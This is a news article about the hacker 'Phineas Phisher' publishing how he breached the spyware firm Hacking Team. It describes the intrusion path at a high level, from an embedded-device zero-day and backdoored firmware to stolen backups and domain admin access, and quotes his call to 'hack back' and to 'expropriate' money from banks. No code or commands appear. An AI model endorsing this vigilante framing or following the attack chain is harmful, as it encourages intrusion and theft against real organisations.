Brian KlugOn Friday, the self-described black hat hacker who claimed responsibility for the Hacking Team dump last year, and who goes by the handle “Phineas Phisher,” published the technical details of how he pulled off the caper—and encouraged others to follow his example.
The apparently bilingual hacker originally published the details in Spanish—”just having some fun trolling the English speaking internet,” he posted on Reddit—but subsequently translated the document into English.
Private intelligence contractor Hacking Team develops and sells hacking tools to governments around the world, a practice many have questioned as enabling human rights violations.
“Hacking Team was a company that helped governments hack and spy on journalists, activists, political opposition, and other threats to their power,” Phisher wrote, accusing Hacking Team CEO David Vincenzetti of being a “fascist.”
“Companies like Hacking Team doing the state’s dirty work deserve to get owned and exposed,” he posted on Reddit.
Phisher is no script kiddie, whoever he is.
The attack he describes goes well beyond exploiting OWASP Top 10 vulnerabilities.
“The guy is kind of a ninja,” Dan Tentler, CEO of Phobos Group, which does attack simulation as a service, told Ars. “It’s pretty rare you find exploitation, reverse engineering, exploit development, lateral movement, networking/routing, and exfiltration all in the same person.”
How the hack went down
The hacker says that he discarded the idea of spear-phishing Hacking Team, writing that even though the technique is “responsible for the majority of hacks these days…
I didn’t want to try to spear phish Hacking Team, as their whole business is helping governments spear phish their opponents, so they’d be much more likely to recognise and investigate a spear phishing attempt.”
To make things more challenging, Hacking Team appears to have secured their networks quite well. Unlike Gamma Group International, which the black hat also targeted (hence his Twitter handle @GammaGroupPR), Hacking Team did not expose much of an attack surface—only an up-to-date version of Joomla, “a mail server, a couple routers, two VPN appliances, and a spam filtering appliance.”
So, the hacker explains, three options presented themselves: “look for a zero-day in Joomla, look for a zero-day in postfix, or look for a zero-day in one of the embedded devices.”
“A zero-day in an embedded device seemed like the easiest option,” the hacker added, “and after two weeks of work reverse engineering, I got a remote root exploit.”
The hacker claims that he wrote backdoored firmware for the (unnamed) embedded device, and spent considerable time testing the backdoor to ensure that it would not cause system instability and prompt an employee to look more closely at the device.
Once inside, the hacker says he took a slow look around, and discovered an insecure MongoDB install, which he took the time to slag off in his pastebin post, writing “NoSQL, or rather NoAuthentication, has been a huge gift to the hacker community. Just when I was worried that they’d finally patched all of the authentication bypass bugs in MySQL, new databases came into style that lack authentication by design.”
But, according to the hacker, it was Hacking Team’s backups that proved the company’s undoing.
Their iSCSI devices were available on the local subnet, which the hacker mounted remotely on an external VPS he controlled.
“There were two distinct things this guy did that were impressive,” Tentler said. “1) writing a zero-day for an embedded Linux device, and 2) some very tricky networking and iptables rules to remotely mount an iSCSI device, through the compromised embedded device, so that some virtual machine he had out on the Internet could read data on a NAS.”
“That second item,” Tentler added, “that’s what got him access to backups—and in those backups he found the BES and admin credentials, and those credentials were a domain admin—so as soon as he found that out, it was game over. He was domain admin on their network.”
The hacker then apparently downloaded Hacking Team’s e-mail from their Exchange server.
But he was still missing the crown jewels—the company’s source code.
So Phisher went after Hacking Team’s sysadmin, Christian Pozzi, who apparently kept all his passwords in an encrypted TrueCrypt volume. “I waited until he’d mounted it,” Phisher wrote, “and then copied off the files.”
“That’s all it takes to take down a company and stop their human rights abuses,” Phisher wrote. “That’s the beauty and asymmetry of hacking: with 100 hours of work, one person can undo years of work by a multi-million dollar company. Hacking gives the underdog a chance to fight and win.”
A modern-day Robin Hood?
The hacker ended his technical analysis with a call to “hack back,” and proposed a concept of “ethical hacking” that could best be described as being a kind of modern-day Robin Hood:
Hacking guides often end with a disclaimer: this information is for educational purposes only, be an ethical hacker, don’t attack systems you don’t have permission to, etc.
I’ll say the same, but with a more rebellious conception of “ethical” hacking. Leaking documents, expropriating money from banks, and working to secure the computers of ordinary people is ethical hacking. However, most people that call themselves “ethical hackers” just work to secure those who pay their high consulting fees, who are often those most deserving to be hacked.
Regardless of whether Phineas Phisher is who he says he is—and not, say, a state actor—his call to action seems likely to provoke copycat hackers. The hacker initially agreed to answer a few questions for Ars, even though he’s usually “very distrustful of the media,” as he put it in an encrypted e-mail, but later changed his mind. We’ll update this story if he decides to respond.
Hacker Team’s Vincenzetti, in a Monday morning e-mail to his private e-mail list that has been seen by Ars, said that “multiple law enforcement investigations are underway in several countries. We hope that the vigilante’s barging [sic – bragging?] about his work will lead to his swift arrest and prosecution.”
Vincenzetti emphasised that Hacking Team are developing “new cutting-edge tools” and that they have “overhauled and secured internal computer networks.” He also cited “inaccuracies” in the hacker’s story, but did not specify what those might be.
This post originated on Ars Technica UK